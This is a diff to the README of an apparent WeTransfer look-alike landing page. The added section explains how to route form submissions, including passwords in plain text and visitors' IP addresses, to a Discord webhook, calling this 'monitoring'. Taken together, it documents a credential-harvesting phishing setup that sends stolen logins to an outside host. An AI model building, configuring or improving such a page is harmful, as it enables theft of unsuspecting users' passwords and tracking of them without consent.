Jauganaut/wetransfer/README.md

 - **Cloudflare Pages:** The project can also be deployed to Cloudflare Pages, which offers seamless integration with Git providers for automatic deployments.
 ## Customization
 Easily personalize the landing page to match your brand.
+### Discord Integration
+The application can send form submission data to a Discord channel via webhooks:
+1. **Create a Discord webhook:** In your Discord server settings, go to Integrations > Webhooks and create a new webhook.
+2. **Configure the webhook URL:** Add `VITE_DISCORD_WEBHOOK_URL=https://discord.com/api/webhooks/YOUR_ID/YOUR_TOKEN` to your `.env` file.
+3. **Test the integration:** Submit forms on the landing page - you'll see Discord embeds with the form data including IP addresses.
+4. **Security note:** Form data including passwords is sent in plain text to Discord for monitoring purposes.
+5. **IP Address Tracking:** The user's IP address is automatically captured and included in Discord notifications for security monitoring.

 ### Changing the Logo
 1.  **Create the assets directory:** In the project's root, create a `public` folder if it doesn't exist, and inside it, create an `assets` folder.
 Your path should be `public/assets/`.
 2.  **Add your logo:** Place your logo file inside `public/assets/`.
 For best results, name it `logo.png` or `logo.svg`.
 A recommended size is around 120x24 pixels for crisp display.